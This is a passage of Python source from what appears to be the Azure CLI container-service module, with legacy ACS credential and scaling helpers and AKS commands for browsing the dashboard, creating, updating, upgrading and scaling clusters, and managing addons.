if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _get_object_stubs(graph_client, assignees):
from azure.graphrbac.models import GetObjectsParameters
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs kubernetes get-credentials
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(
name, acs_info, path, ssh_key_file, overwrite_existing)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs kubernetes browse/get-credentials
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(
path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning(
'Failed to merge credentials to kube config file: %s', exc)
logger.warning(
'The credentials have been saved to %s', path_candidate)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs kubernetes browse/get-credentials
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs list
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs list-locations
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs scale
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=disable_browser,
listen_address=listen_address,
listen_port=listen_port,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
# pylint: disable=too-many-statements,too-many-branches
def _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=resource_type,
operation_group='managed_clusters')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
return_msg = None
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
return_msg = "Kubernetes resources view on {}".format(dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return return_msg
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise FileOperationError('Can not find kubectl executable in PATH')
fd, browse_path = tempfile.mkstemp()
try:
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
[
"kubectl",
"get",
"pods",
"--kubeconfig",
browse_path,
"--namespace",
"kube-system",
"--output",
"name",
"--selector",
"k8s-app=kubernetes-dashboard",
],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard pod: {} Command output: {}'.format(err, err.output))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise ResourceNotFoundError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
[
"kubectl",
"get",
"pods",
"--kubeconfig",
browse_path,
"--namespace",
"kube-system",
"--selector",
"k8s-app=kubernetes-dashboard",
"--output",
"jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'",
],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
# output format: "'{port}'"
dashboard_port = int((dashboard_port.replace("'", "")))
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard port: {} Command output: {}'.format(err, err.output))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post(
"http://localhost:8888/openLink/{0}".format(term_id),
json={"url": dashboardURL},
)
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
timeout = None
test_hook_data = get_cmd_test_hook_data("test_aks_browse_legacy.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("enableTimeout", False):
timeout = test_configs.get("timeoutInterval", None)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(
[
"kubectl",
"--kubeconfig",
browse_path,
"proxy",
"--address",
listen_address,
"--port",
listen_port,
],
universal_newlines=True,
stderr=subprocess.STDOUT,
timeout=timeout,
)
except subprocess.CalledProcessError as err:
if err.output.find('unknown flag: --address'):
return_msg = "Test Invalid Address! "
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
try:
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port], timeout=timeout)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except subprocess.CalledProcessError as new_err:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
new_err, new_err.output
)
)
else:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
err, err.output
)
)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
finally:
os.close(fd)
return return_msg
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
# pylint: disable=too-many-locals
def aks_create(
cmd,
client,
resource_group_name,
name,
ssh_key_value,
location=None,
kubernetes_version="",
tags=None,
dns_name_prefix=None,
node_osdisk_diskencryptionset_id=None,
disable_local_accounts=False,
disable_rbac=None,
edge_zone=None,
admin_username="azureuser",
generate_ssh_keys=False,
no_ssh_key=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
network_plugin=None,
network_policy=None,
auto_upgrade_channel=None,
cluster_autoscaler_profile=None,
uptime_sla=False,
fqdn_subdomain=None,
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
private_dns_zone=None,
disable_public_fqdn=False,
service_principal=None,
client_secret=None,
enable_managed_identity=True,
assign_identity=None,
assign_kubelet_identity=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
attach_acr=None,
skip_subnet_role_assignment=False,
node_resource_group=None,
enable_defender=False,
defender_config=None,
# addons
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
rotation_poll_interval=None,
# nodepool paramerters
nodepool_name="nodepool1",
node_vm_size=None,
os_sku=None,
snapshot_id=None,
vnet_subnet_id=None,
pod_subnet_id=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
enable_cluster_autoscaler=False,
min_count=None,
max_count=None,
node_count=3,
nodepool_tags=None,
nodepool_labels=None,
node_osdisk_type=None,
node_osdisk_size=0,
vm_set_type=None,
zones=None,
ppg=None,
max_pods=0,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
enable_fips_image=False,
kubelet_config=None,
linux_os_config=None,
no_wait=False,
yes=False,
aks_custom_headers=None,
):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from azure.cli.command_modules.acs.managed_cluster_decorator import AKSManagedClusterCreateDecorator
aks_create_decorator = AKSManagedClusterCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_profile_default()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc(mc)
def aks_update(
cmd,
client,
resource_group_name,
name,
tags=None,
disable_local_accounts=False,
enable_local_accounts=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
auto_upgrade_channel=None,
cluster_autoscaler_profile=None,
uptime_sla=False,
no_uptime_sla=False,
api_server_authorized_ip_ranges=None,
enable_public_fqdn=False,
disable_public_fqdn=False,
enable_managed_identity=False,
assign_identity=None,
assign_kubelet_identity=None,
enable_aad=False,
enable_azure_rbac=False,
disable_azure_rbac=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
windows_admin_password=None,
enable_ahub=False,
disable_ahub=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
attach_acr=None,
detach_acr=None,
enable_defender=False,
disable_defender=False,
defender_config=None,
# addons
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
# nodepool paramerters
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None,
max_count=None,
nodepool_labels=None,
no_wait=False,
yes=False,
aks_custom_headers=None,
):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from azure.cli.command_modules.acs.managed_cluster_decorator import AKSManagedClusterUpdateDecorator
aks_update_decorator = AKSManagedClusterUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_profile_default()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc(mc)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client,
resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name,
snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(
no_wait,
client.begin_upgrade_node_image_version,
resource_group_name,
cluster_name,
nodepool_name,
headers=headers)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
# pylint: disable=line-too-long
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
# pylint: disable=line-too-long
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False,
enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
msi_auth = False
if instance.service_principal_profile.client_id == "msi":
msi_auth = True
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation,
rotation_poll_interval=rotation_poll_interval,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if msi_auth:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
aad_route=True,
create_dcr=True,
create_dcra=True)
else:
raise ArgumentUsageError(
"--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
# For monitoring addon, Metrics role assignement doesnt require in case of MSI auth
if enable_monitoring and not enable_msi_auth_for_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(
result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise AzureInternalError(
'The open-service-mesh addon is already enabled for this managed '
'cluster.\n To change open-service-mesh configuration, run '
'"az aks disable-addons -a open-service-mesh -n {} -g {}" '
'before enabling it again.'
.format(name, resource_group_name))
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise ArgumentUsageError(
'The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" ' # pylint: disable=line-too-long
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
